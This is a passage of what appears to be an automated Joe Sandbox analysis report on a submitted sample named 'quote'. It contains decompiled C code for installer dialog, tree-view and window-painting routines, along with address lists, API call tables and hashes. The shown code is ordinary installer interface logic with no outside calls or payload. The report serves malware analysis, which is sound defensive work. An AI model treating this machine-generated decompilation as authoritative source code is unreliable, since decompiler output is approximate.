                                                                                      							SendMessageW(_v12, 0x151, SendMessageW(_v12, 0x143, 0, E0040644E(_t304, 0, _t331, 0, _t273)), _t304);
                                                                                      						}
                                                                                      						_t304 = _t304 + 1;
                                                                                      					} while (_t304 < 0x21);
                                                                                      					_t305 = _a16;
                                                                                      					_push( *((intOrPtr*)(_t305 + 0x30 + _v20 * 4)));
                                                                                      					_push(0x15);
                                                                                      					E00404367(_a4);
                                                                                      					_push( *((intOrPtr*)(_t305 + 0x34 + _v20 * 4)));
                                                                                      					_push(0x16);
                                                                                      					E00404367(_a4);
                                                                                      					_t306 = 0;
                                                                                      					_v16 = 0;
                                                                                      					if( *0x434f4c <= 0) {
                                                                                      						L19:
                                                                                      						SetWindowLongW(_v8, 0xfffffff0, GetWindowLongW(_v8, 0xfffffff0) & 0x000000fb);
                                                                                      						goto L20;
                                                                                      					} else {
                                                                                      						_t324 = _v36 + 8;
                                                                                      						_v28 = _t324;
                                                                                      						do {
                                                                                      							_t285 =  &(_t324[0x10]);
                                                                                      							if( *_t285 != 0) {
                                                                                      								_v64 = _t285;
                                                                                      								_t286 =  *_t324;
                                                                                      								_v88 = _v16;
                                                                                      								_t316 = 0x20;
                                                                                      								_v84 = 0xffff0002;
                                                                                      								_v80 = 0xd;
                                                                                      								_v68 = _t316;
                                                                                      								_v44 = _t306;
                                                                                      								_v72 = _t286 & _t316;
                                                                                      								if((_t286 & 0x00000002) == 0) {
                                                                                      									if((_t286 & 0x00000004) == 0) {
                                                                                      										 *( *0x42d260 + _t306 * 4) = SendMessageW(_v8, 0x1132, 0,  &_v88);
                                                                                      									} else {
                                                                                      										_v16 = SendMessageW(_v8, 0x110a, 3, _v16);
                                                                                      									}
                                                                                      								} else {
                                                                                      									_v80 = 0x4d;
                                                                                      									_v48 = 1;
                                                                                      									_t291 = SendMessageW(_v8, 0x1132, 0,  &_v88);
                                                                                      									_v32 = 1;
                                                                                      									 *( *0x42d260 + _t306 * 4) = _t291;
                                                                                      									_v16 =  *( *0x42d260 + _t306 * 4);
                                                                                      								}
                                                                                      							}
                                                                                      							_t306 = _t306 + 1;
                                                                                      							_t324 =  &(_v28[0x818]);
                                                                                      							_v28 = _t324;
                                                                                      						} while (_t306 <  *0x434f4c);
                                                                                      						if(_v32 != 0) {
                                                                                      							L20:
                                                                                      							if(_v20 != 0) {
                                                                                      								E0040439C(_v8);
                                                                                      								_t298 = _v36;
                                                                                      								goto L23;
                                                                                      							} else {
                                                                                      								ShowWindow(_v12, 5);
                                                                                      								E0040439C(_v12);
                                                                                      								L93:
                                                                                      								return E004043CE(_a8, _a12, _a16);
                                                                                      							}
                                                                                      						}
                                                                                      						goto L19;
                                                                                      					}
                                                                                      				}
                                                                                      			}



























































                                                                                      0x00404df2
                                                                                      0x00404df8
                                                                                      0x00404dfa
                                                                                      0x00404e00
                                                                                      0x00404e06
                                                                                      0x00404e1c
                                                                                      0x00404e1f
                                                                                      0x00404e22
                                                                                      0x00405055
                                                                                      0x0040505c
                                                                                      0x00405070
                                                                                      0x0040505e
                                                                                      0x00405060
                                                                                      0x00405063
                                                                                      0x00405064
                                                                                      0x0040506b
                                                                                      0x0040506b
                                                                                      0x0040507c
                                                                                      0x0040508a
                                                                                      0x0040508d
                                                                                      0x004050a3
                                                                                      0x0040511b
                                                                                      0x0040511e
                                                                                      0x00405120
                                                                                      0x0040512a
                                                                                      0x00405138
                                                                                      0x00405138
                                                                                      0x0040513a
                                                                                      0x00405144
                                                                                      0x0040514a
                                                                                      0x0040514d
                                                                                      0x00405168
                                                                                      0x0040514f
                                                                                      0x00405159
                                                                                      0x00405159
                                                                                      0x0040514d
                                                                                      0x00405144
                                                                                      0x00000000
                                                                                      0x0040511e
                                                                                      0x004050a8
                                                                                      0x004050b3
                                                                                      0x004050b8
                                                                                      0x004050bf
                                                                                      0x004050c6
                                                                                      0x004050c9
                                                                                      0x004050d1
                                                                                      0x004050d1
                                                                                      0x004050d5
                                                                                      0x004050d9
                                                                                      0x004050dd
                                                                                      0x004050f0
                                                                                      0x004050df
                                                                                      0x004050df
                                                                                      0x004050e6
                                                                                      0x004050ec
                                                                                      0x004050e8
                                                                                      0x004050e8
                                                                                      0x004050e8
                                                                                      0x004050e6
                                                                                      0x004050f6
                                                                                      0x004050f8
                                                                                      0x00405100
                                                                                      0x00405108
                                                                                      0x00405118
                                                                                      0x00405118
                                                                                      0x004050d9
                                                                                      0x00000000
                                                                                      0x004050c9
                                                                                      0x004050aa
                                                                                      0x004050b1
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040516b
                                                                                      0x0040516b
                                                                                      0x00405172
                                                                                      0x004051e3
                                                                                      0x004051ea
                                                                                      0x004051f6
                                                                                      0x004051f6
                                                                                      0x004051ff
                                                                                      0x00405201
                                                                                      0x00405208
                                                                                      0x0040520b
                                                                                      0x0040520b
                                                                                      0x00405211
                                                                                      0x00405218
                                                                                      0x0040521b
                                                                                      0x0040521b
                                                                                      0x00405221
                                                                                      0x00405227
                                                                                      0x0040522d
                                                                                      0x0040522d
                                                                                      0x0040523a
                                                                                      0x0040539a
                                                                                      0x004053a1
                                                                                      0x004053be
                                                                                      0x004053c4
                                                                                      0x004053d6
                                                                                      0x004053d6
                                                                                      0x00000000
                                                                                      0x00405240
                                                                                      0x00405242
                                                                                      0x00405247
                                                                                      0x0040524c
                                                                                      0x00405251
                                                                                      0x00405253
                                                                                      0x00405253
                                                                                      0x00405254
                                                                                      0x00405255
                                                                                      0x00405257
                                                                                      0x00405257
                                                                                      0x0040525f
                                                                                      0x004052a0
                                                                                      0x004052a2
                                                                                      0x004052b2
                                                                                      0x004052b5
                                                                                      0x004052ba
                                                                                      0x004052c1
                                                                                      0x004052c4
                                                                                      0x00405366
                                                                                      0x0040536e
                                                                                      0x00405376
                                                                                      0x00405376
                                                                                      0x0040537c
                                                                                      0x00405384
                                                                                      0x00405395
                                                                                      0x00405395
                                                                                      0x00000000
                                                                                      0x00405384
                                                                                      0x004052ca
                                                                                      0x004052cd
                                                                                      0x004052d3
                                                                                      0x004052d8
                                                                                      0x004052da
                                                                                      0x004052dc
                                                                                      0x004052e2
                                                                                      0x004052e9
                                                                                      0x004052ee
                                                                                      0x004052f5
                                                                                      0x004052f8
                                                                                      0x004052f8
                                                                                      0x004052ff
                                                                                      0x0040530b
                                                                                      0x0040530f
                                                                                      0x00405311
                                                                                      0x00405311
                                                                                      0x00405301
                                                                                      0x00405303
                                                                                      0x00405303
                                                                                      0x00405331
                                                                                      0x0040533d
                                                                                      0x0040534c
                                                                                      0x0040534c
                                                                                      0x0040534e
                                                                                      0x00405351
                                                                                      0x0040535a
                                                                                      0x00000000
                                                                                      0x00405261
                                                                                      0x0040526c
                                                                                      0x0040526f
                                                                                      0x00405274
                                                                                      0x00405276
                                                                                      0x0040527a
                                                                                      0x0040528a
                                                                                      0x00405294
                                                                                      0x00405296
                                                                                      0x00405299
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040527c
                                                                                      0x0040527c
                                                                                      0x00405282
                                                                                      0x00405284
                                                                                      0x00405284
                                                                                      0x00405285
                                                                                      0x00405286
                                                                                      0x00000000
                                                                                      0x0040527c
                                                                                      0x0040525f
                                                                                      0x0040523a
                                                                                      0x0040517a
                                                                                      0x00000000
                                                                                      0x00405190
                                                                                      0x0040519a
                                                                                      0x0040519f
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004051b1
                                                                                      0x004051b6
                                                                                      0x004051c2
                                                                                      0x004051c2
                                                                                      0x004051c4
                                                                                      0x004051d3
                                                                                      0x004051d5
                                                                                      0x004051d9
                                                                                      0x004051dc
                                                                                      0x00000000
                                                                                      0x004051dc
                                                                                      0x0040517a
                                                                                      0x00404e28
                                                                                      0x00404e2d
                                                                                      0x00404e37
                                                                                      0x00404e38
                                                                                      0x00404e41
                                                                                      0x00404e50
                                                                                      0x00404e5b
                                                                                      0x00404e61
                                                                                      0x00404e6f
                                                                                      0x00404e84
                                                                                      0x00404e89
                                                                                      0x00404e94
                                                                                      0x00404e9d
                                                                                      0x00404eb2
                                                                                      0x00404ec3
                                                                                      0x00404ed0
                                                                                      0x00404ed0
                                                                                      0x00404ed5
                                                                                      0x00404edb
                                                                                      0x00404edd
                                                                                      0x00404ee0
                                                                                      0x00404ee5
                                                                                      0x00404eea
                                                                                      0x00404eec
                                                                                      0x00404eec
                                                                                      0x00404f0c
                                                                                      0x00404f0c
                                                                                      0x00404f0e
                                                                                      0x00404f0f
                                                                                      0x00404f14
                                                                                      0x00404f1a
                                                                                      0x00404f1e
                                                                                      0x00404f23
                                                                                      0x00404f2b
                                                                                      0x00404f2f
                                                                                      0x00404f34
                                                                                      0x00404f39
                                                                                      0x00404f41
                                                                                      0x00404f44
                                                                                      0x00405014
                                                                                      0x00405027
                                                                                      0x00000000
                                                                                      0x00404f4a
                                                                                      0x00404f4d
                                                                                      0x00404f50
                                                                                      0x00404f53
                                                                                      0x00404f53
                                                                                      0x00404f59
                                                                                      0x00404f62
                                                                                      0x00404f65
                                                                                      0x00404f69
                                                                                      0x00404f6c
                                                                                      0x00404f6f
                                                                                      0x00404f78
                                                                                      0x00404f81
                                                                                      0x00404f84
                                                                                      0x00404f87
                                                                                      0x00404f8a
                                                                                      0x00404fc8
                                                                                      0x00404ff3
                                                                                      0x00404fca
                                                                                      0x00404fd9
                                                                                      0x00404fd9
                                                                                      0x00404f8c
                                                                                      0x00404f8f
                                                                                      0x00404f9d
                                                                                      0x00404fa7
                                                                                      0x00404faf
                                                                                      0x00404fb6
                                                                                      0x00404fc1
                                                                                      0x00404fc1
                                                                                      0x00404f8a
                                                                                      0x00404ff9
                                                                                      0x00404ffa
                                                                                      0x00405006
                                                                                      0x00405006
                                                                                      0x00405012
                                                                                      0x0040502d
                                                                                      0x00405030
                                                                                      0x0040504d
                                                                                      0x00405052
                                                                                      0x00000000
                                                                                      0x00405032
                                                                                      0x00405037
                                                                                      0x00405040
                                                                                      0x004053d8
                                                                                      0x004053ea
                                                                                      0x004053ea
                                                                                      0x00405030
                                                                                      0x00000000
                                                                                      0x00405012
                                                                                      0x00404f44

                                                                                      APIs
                                                                                      • GetDlgItem.USER32(?,000003F9), ref: 00404DEB
                                                                                      • GetDlgItem.USER32(?,00000408), ref: 00404DF8
                                                                                      • GlobalAlloc.KERNEL32(00000040,?), ref: 00404E44
                                                                                      • LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404E5B
                                                                                      • SetWindowLongW.USER32(?,000000FC,004053ED), ref: 00404E75
                                                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404E89
                                                                                      • ImageList_AddMasked.COMCTL32(00000000,00000110,00FF00FF), ref: 00404E9D
                                                                                      • SendMessageW.USER32(?,00001109,00000002), ref: 00404EB2
                                                                                      • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404EBE
                                                                                      • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404ED0
                                                                                      • DeleteObject.GDI32(00000110), ref: 00404ED5
                                                                                      • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404F00
                                                                                      • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404F0C
                                                                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404FA7
                                                                                      • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404FD7
                                                                                        • Part of subcall function 0040439C: SendMessageW.USER32(00000028,?,00000001,004041C7), ref: 004043AA
                                                                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404FEB
                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00405019
                                                                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00405027
                                                                                      • ShowWindow.USER32(?,00000005), ref: 00405037
                                                                                      • SendMessageW.USER32(?,00000419,00000000,?), ref: 00405138
                                                                                      • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040519A
                                                                                      • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 004051AF
                                                                                      • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 004051D3
                                                                                      • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 004051F6
                                                                                      • ImageList_Destroy.COMCTL32(?), ref: 0040520B
                                                                                      • GlobalFree.KERNEL32(?), ref: 0040521B
                                                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405294
                                                                                      • SendMessageW.USER32(?,00001102,?,?), ref: 0040533D
                                                                                      • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040534C
                                                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 00405376
                                                                                      • ShowWindow.USER32(?,00000000), ref: 004053C4
                                                                                      • GetDlgItem.USER32(?,000003FE), ref: 004053CF
                                                                                      • ShowWindow.USER32(00000000), ref: 004053D6
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1324601022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1324552152.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1324683262.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1324736673.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325005143.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325059654.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325126784.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325184138.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325253333.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325304342.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_quote.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                      • String ID: $M$N$j&l
                                                                                      • API String ID: 2564846305-2855049176
                                                                                      • Opcode ID: 7b7957ea1338d254e874131d8d2f31ce821a0993c9efe37939129592d3677914
                                                                                      • Instruction ID: d580a4fcaa5169941c29ca465f5867fc490570c71858173d192e260bc12e7e27
                                                                                      • Opcode Fuzzy Hash: 7b7957ea1338d254e874131d8d2f31ce821a0993c9efe37939129592d3677914
                                                                                      • Instruction Fuzzy Hash: 9C127A70D00609EFDB20DFA5CD45AAEBBB5FB84314F10817AEA10BA2E1C7798941DF58
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 92%
                                                                                      			E00404526(struct HWND__* _a4, int _a8, unsigned int _a12, WCHAR* _a16) {
                                                                                      				intOrPtr _v8;
                                                                                      				int _v12;
                                                                                      				void* _v16;
                                                                                      				struct HWND__* _t56;
                                                                                      				intOrPtr _t69;
                                                                                      				signed int _t75;
                                                                                      				signed short* _t76;
                                                                                      				signed short* _t78;
                                                                                      				long _t92;
                                                                                      				int _t103;
                                                                                      				signed int _t110;
                                                                                      				intOrPtr _t111;
                                                                                      				intOrPtr _t113;
                                                                                      				WCHAR* _t114;
                                                                                      				signed int* _t116;
                                                                                      				WCHAR* _t117;
                                                                                      				struct HWND__* _t118;
                                                                                      
                                                                                      				if(_a8 != 0x110) {
                                                                                      					if(_a8 != 0x111) {
                                                                                      						L13:
                                                                                      						if(_a8 != 0x4e) {
                                                                                      							if(_a8 == 0x40b) {
                                                                                      								 *0x42b234 =  *0x42b234 + 1;
                                                                                      							}
                                                                                      							L27:
                                                                                      							_t114 = _a16;
                                                                                      							L28:
                                                                                      							return E004043CE(_a8, _a12, _t114);
                                                                                      						}
                                                                                      						_t56 = GetDlgItem(_a4, 0x3e8);
                                                                                      						_t114 = _a16;
                                                                                      						if( *((intOrPtr*)(_t114 + 8)) == 0x70b &&  *((intOrPtr*)(_t114 + 0xc)) == 0x201) {
                                                                                      							_t103 =  *((intOrPtr*)(_t114 + 0x1c));
                                                                                      							_t113 =  *((intOrPtr*)(_t114 + 0x18));
                                                                                      							_v12 = _t103;
                                                                                      							_v16 = _t113;
                                                                                      							_v8 = 0x432ea0;
                                                                                      							if(_t103 - _t113 < 0x800) {
                                                                                      								SendMessageW(_t56, 0x44b, 0,  &_v16);
                                                                                      								SetCursor(LoadCursorW(0, 0x7f02));
                                                                                      								_push(1);
                                                                                      								E004047D5(_a4, _v8);
                                                                                      								SetCursor(LoadCursorW(0, 0x7f00));
                                                                                      								_t114 = _a16;
                                                                                      							}
                                                                                      						}
                                                                                      						if( *((intOrPtr*)(_t114 + 8)) != 0x700 ||  *((intOrPtr*)(_t114 + 0xc)) != 0x100) {
                                                                                      							goto L28;
                                                                                      						} else {
                                                                                      							if( *((intOrPtr*)(_t114 + 0x10)) == 0xd) {
                                                                                      								SendMessageW( *0x434f08, 0x111, 1, 0);
                                                                                      							}
                                                                                      							if( *((intOrPtr*)(_t114 + 0x10)) == 0x1b) {
                                                                                      								SendMessageW( *0x434f08, 0x10, 0, 0);
                                                                                      							}
                                                                                      							return 1;
                                                                                      						}
                                                                                      					}
                                                                                      					if(_a12 >> 0x10 != 0 ||  *0x42b234 != 0) {
                                                                                      						goto L27;
                                                                                      					} else {
                                                                                      						_t69 =  *0x42c240; // 0x6bbd9c
                                                                                      						_t29 = _t69 + 0x14; // 0x6bbdb0
                                                                                      						_t116 = _t29;
                                                                                      						if(( *_t116 & 0x00000020) == 0) {
                                                                                      							goto L27;
                                                                                      						}
                                                                                      						 *_t116 =  *_t116 & 0xfffffffe | SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
                                                                                      						E00404389(SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
                                                                                      						E004047B1();
                                                                                      						goto L13;
                                                                                      					}
                                                                                      				}
                                                                                      				_t117 = _a16;
                                                                                      				_t75 =  *(_t117 + 0x30);
                                                                                      				if(_t75 < 0) {
                                                                                      					_t111 =  *0x433edc; // 0x6c266a
                                                                                      					_t75 =  *(_t111 - 4 + _t75 * 4);
                                                                                      				}
                                                                                      				_t76 =  *0x434f58 + _t75 * 2;
                                                                                      				_t110 =  *_t76 & 0x0000ffff;
                                                                                      				_a8 = _t110;
                                                                                      				_t78 =  &(_t76[1]);
                                                                                      				_a16 = _t78;
                                                                                      				_v16 = _t78;
                                                                                      				_v12 = 0;
                                                                                      				_v8 = E004044D7;
                                                                                      				if(_t110 != 2) {
                                                                                      					_v8 = E0040449D;
                                                                                      				}
                                                                                      				_push( *((intOrPtr*)(_t117 + 0x34)));
                                                                                      				_push(0x22);
                                                                                      				E00404367(_a4);
                                                                                      				_push( *((intOrPtr*)(_t117 + 0x38)));
                                                                                      				_push(0x23);
                                                                                      				E00404367(_a4);
                                                                                      				CheckDlgButton(_a4, (0 | ( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
                                                                                      				E00404389( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001);
                                                                                      				_t118 = GetDlgItem(_a4, 0x3e8);
                                                                                      				E0040439C(_t118);
                                                                                      				SendMessageW(_t118, 0x45b, 1, 0);
                                                                                      				_t92 =  *( *0x434f14 + 0x68);
                                                                                      				if(_t92 < 0) {
                                                                                      					_t92 = GetSysColor( ~_t92);
                                                                                      				}
                                                                                      				SendMessageW(_t118, 0x443, 0, _t92);
                                                                                      				SendMessageW(_t118, 0x445, 0, 0x4010000);
                                                                                      				SendMessageW(_t118, 0x435, 0, lstrlenW(_a16));
                                                                                      				 *0x42b234 = 0;
                                                                                      				SendMessageW(_t118, 0x449, _a8,  &_v16);
                                                                                      				 *0x42b234 = 0;
                                                                                      				return 0;
                                                                                      			}




















                                                                                      0x00404538
                                                                                      0x00404665
                                                                                      0x004046c2
                                                                                      0x004046c6
                                                                                      0x00404793
                                                                                      0x00404795
                                                                                      0x00404795
                                                                                      0x0040479b
                                                                                      0x0040479b
                                                                                      0x0040479e
                                                                                      0x00000000
                                                                                      0x004047a5
                                                                                      0x004046d4
                                                                                      0x004046da
                                                                                      0x004046e4
                                                                                      0x004046ef
                                                                                      0x004046f2
                                                                                      0x004046f5
                                                                                      0x00404700
                                                                                      0x00404703
                                                                                      0x0040470a
                                                                                      0x00404717
                                                                                      0x00404728
                                                                                      0x0040472e
                                                                                      0x00404736
                                                                                      0x00404744
                                                                                      0x0040474a
                                                                                      0x0040474a
                                                                                      0x0040470a
                                                                                      0x00404754
                                                                                      0x00000000
                                                                                      0x0040475f
                                                                                      0x00404763
                                                                                      0x00404773
                                                                                      0x00404773
                                                                                      0x00404779
                                                                                      0x00404785
                                                                                      0x00404785
                                                                                      0x00000000
                                                                                      0x00404789
                                                                                      0x00404754
                                                                                      0x00404670
                                                                                      0x00000000
                                                                                      0x00404682
                                                                                      0x00404682
                                                                                      0x00404687
                                                                                      0x00404687
                                                                                      0x0040468d
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004046b6
                                                                                      0x004046b8
                                                                                      0x004046bd
                                                                                      0x00000000
                                                                                      0x004046bd
                                                                                      0x00404670
                                                                                      0x0040453e
                                                                                      0x00404541
                                                                                      0x00404546
                                                                                      0x00404548
                                                                                      0x00404557
                                                                                      0x00404557
                                                                                      0x0040455f
                                                                                      0x00404562
                                                                                      0x00404566
                                                                                      0x00404569
                                                                                      0x0040456d
                                                                                      0x00404570
                                                                                      0x00404573
                                                                                      0x00404576
                                                                                      0x0040457d
                                                                                      0x0040457f
                                                                                      0x0040457f
                                                                                      0x00404589
                                                                                      0x00404596
                                                                                      0x004045a0
                                                                                      0x004045a5
                                                                                      0x004045a8
                                                                                      0x004045ad
                                                                                      0x004045c4
                                                                                      0x004045cb
                                                                                      0x004045de
                                                                                      0x004045e1
                                                                                      0x004045f5
                                                                                      0x004045fc
                                                                                      0x00404601
                                                                                      0x00404606
                                                                                      0x00404606
                                                                                      0x00404614
                                                                                      0x00404622
                                                                                      0x00404634
                                                                                      0x00404639
                                                                                      0x00404649
                                                                                      0x0040464b
                                                                                      0x00000000

                                                                                      APIs
                                                                                      • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 004045C4
                                                                                      • GetDlgItem.USER32(?,000003E8), ref: 004045D8
                                                                                      • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004045F5
                                                                                      • GetSysColor.USER32(?), ref: 00404606
                                                                                      • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404614
                                                                                      • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 00404622
                                                                                      • lstrlenW.KERNEL32(?), ref: 00404627
                                                                                      • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404634
                                                                                      • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404649
                                                                                      • GetDlgItem.USER32(?,0000040A), ref: 004046A2
                                                                                      • SendMessageW.USER32(00000000), ref: 004046A9
                                                                                      • GetDlgItem.USER32(?,000003E8), ref: 004046D4
                                                                                      • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404717
                                                                                      • LoadCursorW.USER32(00000000,00007F02), ref: 00404725
                                                                                      • SetCursor.USER32(00000000), ref: 00404728
                                                                                      • LoadCursorW.USER32(00000000,00007F00), ref: 00404741
                                                                                      • SetCursor.USER32(00000000), ref: 00404744
                                                                                      • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404773
                                                                                      • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404785
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1324601022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1324552152.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1324683262.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1324736673.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325005143.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325059654.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325126784.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325184138.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325253333.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325304342.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_quote.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                                      • String ID: Call$N$j&l
                                                                                      • API String ID: 3103080414-2155457431
                                                                                      • Opcode ID: 3e7f1d81aaa2c81caad56aadef940d4d94f2f382e64dbbb27fd2036abddb4608
                                                                                      • Instruction ID: bc177dfd6b6b6103f733ab6784bbaef7ca361af311f51bfa08924dfc74b84e38
                                                                                      • Opcode Fuzzy Hash: 3e7f1d81aaa2c81caad56aadef940d4d94f2f382e64dbbb27fd2036abddb4608
                                                                                      • Instruction Fuzzy Hash: 79618EB1A00209FFDB109F60DD85AAA7B69FB85314F00843AFA15B72D1D778AD51CF98
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 90%
                                                                                      			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
                                                                                      				struct tagLOGBRUSH _v16;
                                                                                      				struct tagRECT _v32;
                                                                                      				struct tagPAINTSTRUCT _v96;
                                                                                      				struct HDC__* _t70;
                                                                                      				struct HBRUSH__* _t87;
                                                                                      				struct HFONT__* _t94;
                                                                                      				long _t102;
                                                                                      				signed int _t126;
                                                                                      				struct HDC__* _t128;
                                                                                      				intOrPtr _t130;
                                                                                      
                                                                                      				if(_a8 == 0xf) {
                                                                                      					_t130 =  *0x434f14;
                                                                                      					_t70 = BeginPaint(_a4,  &_v96);
                                                                                      					_v16.lbStyle = _v16.lbStyle & 0x00000000;
                                                                                      					_a8 = _t70;
                                                                                      					GetClientRect(_a4,  &_v32);
                                                                                      					_t126 = _v32.bottom;
                                                                                      					_v32.bottom = _v32.bottom & 0x00000000;
                                                                                      					while(_v32.top < _t126) {
                                                                                      						_a12 = _t126 - _v32.top;
                                                                                      						asm("cdq");
                                                                                      						asm("cdq");
                                                                                      						asm("cdq");
                                                                                      						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
                                                                                      						_t87 = CreateBrushIndirect( &_v16);
                                                                                      						_v32.bottom = _v32.bottom + 4;
                                                                                      						_a16 = _t87;
                                                                                      						FillRect(_a8,  &_v32, _t87);
                                                                                      						DeleteObject(_a16);
                                                                                      						_v32.top = _v32.top + 4;
                                                                                      					}
                                                                                      					if( *(_t130 + 0x58) != 0xffffffff) {
                                                                                      						_t94 = CreateFontIndirectW( *(_t130 + 0x34));
                                                                                      						_a16 = _t94;
                                                                                      						if(_t94 != 0) {
                                                                                      							_t128 = _a8;
                                                                                      							_v32.left = 0x10;
                                                                                      							_v32.top = 8;
                                                                                      							SetBkMode(_t128, 1);
                                                                                      							SetTextColor(_t128,  *(_t130 + 0x58));
                                                                                      							_a8 = SelectObject(_t128, _a16);
                                                                                      							DrawTextW(_t128, 0x433f00, 0xffffffff,  &_v32, 0x820);
                                                                                      							SelectObject(_t128, _a8);
                                                                                      							DeleteObject(_a16);
                                                                                      						}
                                                                                      					}
                                                                                      					EndPaint(_a4,  &_v96);
                                                                                      					return 0;
                                                                                      				}
                                                                                      				_t102 = _a16;
                                                                                      				if(_a8 == 0x46) {
                                                                                      					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
                                                                                      					 *((intOrPtr*)(_t102 + 4)) =  *0x434f08;
                                                                                      				}
                                                                                      				return DefWindowProcW(_a4, _a8, _a12, _t102);
                                                                                      			}













                                                                                      0x0040100a
                                                                                      0x00401039
                                                                                      0x00401047
                                                                                      0x0040104d
                                                                                      0x00401051
                                                                                      0x0040105b
                                                                                      0x00401061
                                                                                      0x00401064
                                                                                      0x004010f3
                                                                                      0x00401089
                                                                                      0x0040108c
                                                                                      0x004010a6
                                                                                      0x004010bd
                                                                                      0x004010cc
                                                                                      0x004010cf
                                                                                      0x004010d5
                                                                                      0x004010d9
                                                                                      0x004010e4
                                                                                      0x004010ed
                                                                                      0x004010ef
                                                                                      0x004010ef
                                                                                      0x00401100
                                                                                      0x00401105
                                                                                      0x0040110d
                                                                                      0x00401110
                                                                                      0x00401112
                                                                                      0x00401118
                                                                                      0x0040111f
                                                                                      0x00401126
                                                                                      0x00401130
                                                                                      0x00401142
                                                                                      0x00401156
                                                                                      0x00401160
                                                                                      0x00401165
